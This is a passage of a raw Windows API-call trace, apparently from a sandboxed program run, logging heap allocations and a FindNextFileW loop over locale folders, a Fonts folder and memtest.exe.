[0090.679] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef00 | out: hHeap=0x680000) returned 1 [0090.679] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efb30 | out: hHeap=0x680000) returned 1 [0090.679] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef158 | out: hHeap=0x680000) returned 1 [0090.679] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef950 | out: hHeap=0x680000) returned 1 [0090.679] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31621a8 | out: hHeap=0x680000) returned 1 [0090.679] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef950 [0090.679] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9f0 | out: hHeap=0x680000) returned 1 [0090.679] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.679] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0090.679] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.679] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9f0 [0090.679] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef158 [0090.679] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9f0 | out: hHeap=0x680000) returned 1 [0090.679] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.680] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0090.680] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.680] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9f0 [0090.680] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xfc) returned 0x99dea38 [0090.680] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efb30 [0090.680] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef00 [0090.680] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef388 [0090.680] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef130 [0090.680] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efab8 [0090.680] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1a8 [0090.680] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef478 | out: hHeap=0x680000) returned 1 [0090.680] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef3b0 | out: hHeap=0x680000) returned 1 [0090.680] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef4f0 | out: hHeap=0x680000) returned 1 [0090.680] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef8b0 | out: hHeap=0x680000) returned 1 [0090.680] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef950 | out: hHeap=0x680000) returned 1 [0090.680] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef158 | out: hHeap=0x680000) returned 1 [0090.680] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3152ab8 | out: hHeap=0x680000) returned 1 [0090.680] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef158 [0090.680] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9f0 | out: hHeap=0x680000) returned 1 [0090.681] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.681] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Fonts", cAlternateFileName="")) returned 1 [0090.681] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.681] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9f0 [0090.681] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef950 [0090.681] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9f0 | out: hHeap=0x680000) returned 1 [0090.681] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.681] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0090.681] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.681] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9f0 [0090.681] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef8b0 [0090.681] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9f0 | out: hHeap=0x680000) returned 1 [0090.681] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.682] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0090.682] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.682] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9f0 [0090.682] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x16c) returned 0x3112760 [0090.682] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef4f0 [0090.682] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef3b0 [0090.682] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef478 [0090.682] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee88 [0090.682] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef720 [0090.682] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc70 [0090.682] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa18 [0090.682] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef3d8 [0090.682] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef770 [0090.682] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efb30 | out: hHeap=0x680000) returned 1 [0090.683] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef00 | out: hHeap=0x680000) returned 1 [0090.683] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef388 | out: hHeap=0x680000) returned 1 [0090.683] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef130 | out: hHeap=0x680000) returned 1 [0090.683] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efab8 | out: hHeap=0x680000) returned 1 [0090.683] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1a8 | out: hHeap=0x680000) returned 1 [0090.683] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef158 | out: hHeap=0x680000) returned 1 [0090.683] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef950 | out: hHeap=0x680000) returned 1 [0090.683] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef8b0 | out: hHeap=0x680000) returned 1 [0090.683] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0090.683] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef8b0 [0090.683] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9f0 | out: hHeap=0x680000) returned 1 [0090.683] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.683] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="it-IT", cAlternateFileName="")) returned 1 [0090.683] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.684] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9f0 [0090.684] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef950 [0090.684] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9f0 | out: hHeap=0x680000) returned 1 [0090.684] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.684] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0090.684] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.684] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9f0 [0090.684] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef158 [0090.684] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9f0 | out: hHeap=0x680000) returned 1 [0090.684] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.684] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0090.684] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.685] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9f0 [0090.685] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1a8 [0090.685] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9f0 | out: hHeap=0x680000) returned 1 [0090.685] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.685] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x8bc7dbfe, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x76980, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0090.685] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0090.685] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.685] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9f0 [0090.685] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x214) returned 0x31bc228 [0090.685] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efab8 [0090.685] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef130 [0090.685] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef388 [0090.685] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eef00 [0090.685] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efb30 [0090.685] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef310 [0090.686] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0090.686] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0090.686] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef590 [0090.686] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0090.686] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef338 [0090.686] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef040 [0090.686] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef4c8 [0090.686] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef4f0 | out: hHeap=0x680000) returned 1 [0090.686] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef3b0 | out: hHeap=0x680000) returned 1 [0090.686] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef478 | out: hHeap=0x680000) returned 1 [0090.686] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee88 | out: hHeap=0x680000) returned 1 [0090.686] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef720 | out: hHeap=0x680000) returned 1 [0090.686] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc70 | out: hHeap=0x680000) returned 1 [0090.686] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa18 | out: hHeap=0x680000) returned 1 [0090.686] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef3d8 | out: hHeap=0x680000) returned 1 [0090.686] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef770 | out: hHeap=0x680000) returned 1 [0090.687] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef8b0 | out: hHeap=0x680000) returned 1 [0090.687] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef950 | out: hHeap=0x680000) returned 1 [0090.687] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef158 | out: hHeap=0x680000) returned 1 [0090.687] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1a8 | out: hHeap=0x680000) returned 1 [0090.687] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3112760 | out: hHeap=0x680000) returned 1 [0090.687] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1a8 [0090.687] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9f0 | out: hHeap=0x680000) returned 1 [0090.687] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.687] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0090.687] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.687] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9f0 [0090.687] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef158 [0090.688] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9f0 | out: hHeap=0x680000) returned 1 [0090.688] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.688] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0090.688] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.688] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9f0 [0090.688] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef950 [0090.688] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9f0 | out: hHeap=0x680000) returned 1 [0090.688] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.688] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0090.688] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.688] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9f0 [0090.688] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef8b0 [0090.688] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9f0 | out: hHeap=0x680000) returned 1 [0090.688] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.688] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0090.688] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.689] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9f0 [0090.689] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef770 [0090.689] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9f0 | out: hHeap=0x680000) returned 1 [0090.689] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.689] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0090.689] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.689] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9f0 [0090.689] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef3d8 [0090.689] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef9f0 | out: hHeap=0x680000) returned 1 [0090.689] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0090.689] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0090.689] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7c0 [0090.689] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9f0 [0090.689] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x310) returned 0x31ce460 [0090.690] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa18 [0090.690] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc70 [0090.690] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef720 [0090.690] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee88 [0090.690] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef478 [0090.690] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef3b0 [0090.690] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef4f0 [0090.690] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef658 [0090.690] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef068 [0090.690] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef748 [0090.690] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efb80 [0090.690] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee10 [0090.690] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef6a8 [0090.690] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef838 [0090.690] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eefa0 [0090.691] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef5e0 [0090.691] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efb58 [0090.691] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efbd0 [0090.691] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa68 [0090.691] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efab8 | out: hHeap=0x680000) returned 1 [0090.691] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef130 | out: hHeap=0x680000) returned 1 [0090.691] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef388 | out: hHeap=0x680000) returned 1 [0090.691] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef00 | out: hHeap=0x680000) returned 1 [0090.691] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efb30 | out: hHeap=0x680000) returned 1 [0090.691] HeapFree (in: hHeap=0x680000, 